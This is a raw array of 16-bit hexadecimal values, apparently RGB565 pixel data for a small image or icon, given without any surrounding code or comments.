0xfffe, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xe7ff, 0x655a, 0x1354, 0x7ddb, 0xefff, 0xf7df, 0xffdf, 0xffff, 0xffdd, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xfffe, 0xfffb, 0xfffb, 0xffff, 0xa61d, 0x098d, 0x7c96, 0xf7ff, 0xc6dd, 0x6454, 0x5c54, 0xa63a, 0xf7ff, 0xce1b, 0x5457, 0x6412, 0xb65a, 0xe7ff, 0x9e5f, 0x120f, 0x7cd6, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xd7ff, 0x13b4, 0x13f8, 0xc7df, 0xfffc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xeffc, 0xe7fe, 0x8d78, 0x8dbd, 0x8d7b, 0x959a, 0x8dbc, 0x8dbc, 0x8dbc, 0x8dbb, 0x8dbb, 0x8dbb, 0x8dbb, 0x8dbb, 0x8dbb, 0x8dbb, 0x8dbb, 0x95bb, 0x95bb, 0x8dbb, 0x8dbb, 0x8dbb, 0x8d9b, 0x95bb, 0x959a, 0x8dfd, 0x5cfb, 0x4437, 0x8e3d, 0x8dba, 0x8ddb, 0x8ddc, 0x8dbc, 0x959b, 0x959b, 0x8dbb, 0x8ddb, 0x8ddb, 0x85bc, 0x8dbb, 0x95bb, 0x95bb, 0x95bb, 0x8ddb, 0x8ddb, 0x8ddb, 0x8ddb, 0x8ddb, 0x8dba, 0x8537, 0xcedd, 0xffff, 0xffde, 0xfffd, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0x53b2, 0x09cd, 0x12b1, 0x1290, 0x1291, 0x1251, 0x1ab2, 0x12b1, 0x0ab0, 0x0ab0, 0x0291, 0x0291, 0x0ad2, 0x0270, 0x12d1, 0x1291, 0x024f, 0x1ad1, 0x0271, 0x12b1, 0x124e, 0x4b70, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffbe, 0xffff, 0xc79f, 0x23f4, 0x1b93, 0xd7ff, 0xf7ff, 0xffbd, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7fe, 0xfffe, 0xf7ff, 0x7d5a, 0x0231, 0x12f5, 0x4bf5, 0xf7ff, 0xffde, 0xffdf, 0xffdf, 0xf7bf, 0xffff, 0xffde, 0xf7ff, 0x4bb4, 0x12f6, 0x0b78, 0x1334, 0x22af, 0xd77f, 0xf7ff, 0xf7df, 0xfffe, 0xefff, 0xffde, 0xff9d, 0xf7ff, 0x761c, 0x13b3, 0x6599, 0xe7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff,
0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xe7ff, 0x1b76, 0x23b7, 0xcfbf, 0xffff, 0xffde, 0xf7ff, 0xf7ff, 0xf7de, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xe7ff, 0xa69f, 0x01d0, 0x6cd9, 0xe7ff, 0xe7ff, 0xe7ff, 0xd7ff, 0xe7ff, 0xf7ff, 0xffbf, 0xdfff, 0xffff, 0xfffe, 0xf7ff, 0xa67f, 0x0a0f, 0x74b7, 0xf7ff, 0xffff, 0xffbd, 0xfffe, 0xefff, 0x4d1a, 0x0bb6, 0x863c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0x963c, 0x7537, 0xefff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xf7bf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdf3e, 0xe7bf, 0xbefe, 0xcf5f, 0xd77f, 0xc71f, 0xd77f, 0xc75f, 0xc73f, 0xd7df, 0xbf5f, 0xc77f, 0xcf9f, 0xbf1f, 0xcfbf, 0xcf7f, 0xc71f, 0xd7bf, 0xc77f, 0xc75f, 0xd75f, 0xd6fd, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xffff, 0x861c, 0x13d5, 0x5d17, 0xdfff, 0xffff, 0xffde, 0xffbe, 0xffff, 0xf7ff, 0xf7ff, 0xf7dd, 0xf7ff, 0x9e1d, 0x0273, 0x1b57, 0x1290, 0xc6de, 0xffbf, 0xff9d, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xc6df, 0x1a92, 0x1317, 0x0b79, 0x0b56, 0x1313, 0x2ad2, 0xd75f, 0xf7ff, 0xf7fe, 0xefff, 0xffff, 0xffdf, 0xffff, 0xcfbf, 0x1bb2, 0x23f3, 0xd7ff, 0xf7ff, 0xfffd, 0xfffd, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff,
0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xf7ff, 0xaf3f, 0x0b36, 0x4c9b, 0xe7ff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xaebe, 0x3bf7, 0x3b76, 0x3bb8, 0x3397, 0x3bb6, 0x43f6, 0x33b6, 0x2398, 0x0b16, 0x2397, 0x3bb5, 0x3b94, 0x43f5, 0x3394, 0x3bd5, 0x43d5, 0x3b73, 0x33d6, 0x9db9, 0xffde, 0xffff, 0xa67f, 0x09ee, 0x74b8, 0xf7ff, 0xffff, 0xffdd, 0xffdd, 0xf7ff, 0x971f, 0x0bb5, 0x4cd8, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffdf, 0xffbf, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffdd, 0xfffe, 0xefff, 0x8e5b, 0x6d36, 0xefff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xffde, 0xffde, 0xffdf, 0xffde, 0xfffe, 0xfffe, 0xffde, 0xffde, 0xffde, 0xffde, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0x4c97, 0x03b6, 0xa6fe, 0xe7ff, 0xf7ff, 0xfffd, 0xffde, 0xffff, 0xf7ff, 0xf7de, 0xffff, 0xd77f, 0x0272, 0x0318, 0x1315, 0x4bb3, 0xf7ff, 0xffde, 0xffdd, 0xf7ff, 0xefff, 0xffdf, 0xff7d, 0xf7ff, 0x4bf6, 0x0a95, 0x1b59, 0x1317, 0x0357, 0x0358, 0x12d6, 0x32d4, 0xf7ff, 0xf7ff, 0xf7ff, 0xefdf, 0xffdf, 0xffdf, 0xefff, 0x54b6, 0x1373, 0x96ff, 0xefff, 0xfffd, 0xfffd, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff,
0xffff, 0xffff, 0xf7ff, 0xf7fd, 0xe7ff, 0x6d9b, 0x1356, 0x967f, 0xf7ff, 0xffdd, 0xfffe, 0xf7fe, 0xefff, 0xdfbf, 0x1270, 0x02b6, 0x0a53, 0x0232, 0x0a74, 0x0a73, 0x0252, 0x0293, 0x0293, 0x02d4, 0x02b4, 0x0a72, 0x0a51, 0x0251, 0x0293, 0x0293, 0x0292, 0x02b0, 0x0275, 0x0a0f, 0x9d78, 0xe7ff, 0x967f, 0x1250, 0x74d7, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffff, 0xc7df, 0x2c56, 0x1b93, 0xd7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7bf, 0xf7bf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xe7ff, 0x863d, 0x5cd6, 0xefff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffde, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xffde, 0xffdd, 0xffdd, 0xfffe, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xfffe, 0xffde, 0xe7ff, 0x2394, 0x1439, 0xdfdf, 0xe7ff, 0xeffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xefbf, 0x2250, 0x0b17, 0x0b9a, 0x0272, 0xbf3f, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xf7ff, 0xffdf, 0xffff, 0xb6be, 0x0292, 0x13ba, 0x0b39, 0x1b58, 0x0b58, 0x0379, 0x0b7a, 0x0a33, 0x4b52, 0xf7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xf7be, 0xffff, 0x9e9d, 0x0b73, 0x65fd, 0xe7ff, 0xffdd, 0xffdd, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0x4cb7, 0x1b75, 0xbfbf, 0xefff, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xcf3e, 0x122f, 0x2bda, 0xe7ff, 0xdfff, 0xdfff, 0xdfff, 0xdfff, 0xe7ff, 0xdfff, 0xdfff, 0xdfff, 0xdfff, 0xe7ff, 0xe7ff, 0xd7ff, 0xcfff, 0xd7ff, 0xe7ff, 0x86bf, 0x122f, 0x6414, 0xdfff, 0x967f, 0x0a50, 0x6c96, 0xf7ff, 0xf7ff, 0xfffe, 0xffde, 0xffdf, 0xe7ff, 0x4cb6, 0x1b73, 0xaf9f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xeffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xe7ff, 0x7e3d, 0x5cf7, 0xe7ff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xf7ff, 0xc77f, 0x1333, 0x353f, 0xffff, 0xfffe, 0xfffd, 0xf7dd, 0xffdf, 0xffdf, 0xffff, 0xe7ff, 0x3b32, 0x1ad5, 0x1b38, 0x0af6, 0x2396, 0xa73f, 0x967d, 0x9e5c, 0xa6bd, 0xa63a, 0xbe59, 0xffff, 0xf7ff, 0x3332, 0x1356, 0x0358, 0x0358, 0x1337, 0x1b36, 0x02d5, 0x0b59, 0x0b58, 0x0a51, 0x853a, 0xffdf, 0xf7ff, 0xefdf, 0xfffe, 0xffff, 0xbf7f, 0x13b6, 0x34fb, 0xd7ff, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff,
0xffdd, 0xffdf, 0xffff, 0xffff, 0xdfff, 0x3bf4, 0x3436, 0xc7df, 0xf7ff, 0xfffc, 0xffdd, 0xffff, 0xf7ff, 0xd73e, 0x1a0d, 0x4439, 0xffdc, 0xfffb, 0xf797, 0xf799, 0xf7bb, 0xfffc, 0xffdc, 0xef3b, 0xf75d, 0xffbd, 0xfffc, 0xffda, 0xef9a, 0xe73b, 0xffbc, 0xffda, 0xa6bf, 0x220d, 0x6c13, 0xdfff, 0x8e9f, 0x024f, 0x6cd8, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffbf, 0xefff, 0x7557, 0x1b52, 0x8eff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xf7fc, 0xf7fd, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xfffd, 0xfffe, 0xffdd, 0xffde, 0xefff, 0x861c, 0x6d17, 0xf7ff, 0xffde, 0xffbe, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7fe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xeffe, 0xa6fd, 0x1354, 0x4dbf, 0xfffe, 0xffbd, 0xfffd, 0xffdd, 0xfffd, 0xfffe, 0xf7ff, 0x4bf2, 0x0af3, 0x1338, 0x1b17, 0x2315, 0x1b74, 0x02f1, 0x02d1, 0x1291, 0x126f, 0x11a9, 0xce9b, 0xefff, 0x95bc, 0x0a50, 0x1335, 0x0bb7, 0x0398, 0x1376, 0x2b13, 0x965f, 0x0294, 0x039a, 0x1358, 0x1252, 0xe6bc, 0xffff, 0xf7ff, 0xfffd, 0xfffe, 0xcfdf, 0x1c18, 0x2479, 0xcfff, 0xffde, 0xffbe, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xfffd, 0xffff, 0xcfdf, 0x23d5, 0x3c78, 0xd7ff, 0xfffe, 0xffdc, 0xffff, 0xf7ff, 0xf7ff, 0xcf3f, 0x0a4e, 0x2c39, 0xeffc, 0xb6ff, 0x0a15, 0x1a96, 0x6415, 0xf7ff, 0xb6dc, 0x0230, 0x0274, 0x6478, 0xf7ff, 0xa5da, 0x1272, 0x0253, 0x74fa, 0xffff, 0x9e7f, 0x122e, 0x5c53, 0xdfff, 0x9e5f, 0x19ef, 0x7c97, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0x8dfa, 0x2352, 0x765f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xefff, 0xfffe, 0xffdd, 0xe7ff, 0x765c, 0x5d18, 0xf7ff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7fe, 0xefff, 0xefff, 0xffff, 0xffde, 0xffdf, 0xffdf, 0xf7ff, 0x961a, 0x2351, 0x761e, 0xf7fe, 0xf7df, 0xffff, 0xf7fe, 0xeffe, 0xe7ff, 0x7d1d, 0x0235, 0x037a, 0x0399, 0x0b99, 0x0b38, 0x1379, 0x0357, 0x0398, 0x0b78, 0x02b5, 0x6435, 0xffff, 0xd75f, 0x12b3, 0x1378, 0x1336, 0x1376, 0x0378, 0x0398, 0x02b1, 0xd7ff, 0x8dd9, 0x0a6f, 0x1b98, 0x02b6, 0x4b92, 0xe7ff, 0xffff, 0xfffb, 0xfffd, 0xcfff, 0x2c59, 0x23f7, 0xd7df, 0xfffe, 0xffbe, 0xffdf, 0xf7ff, 0xf7ff, 0xfffe, 0xffff,
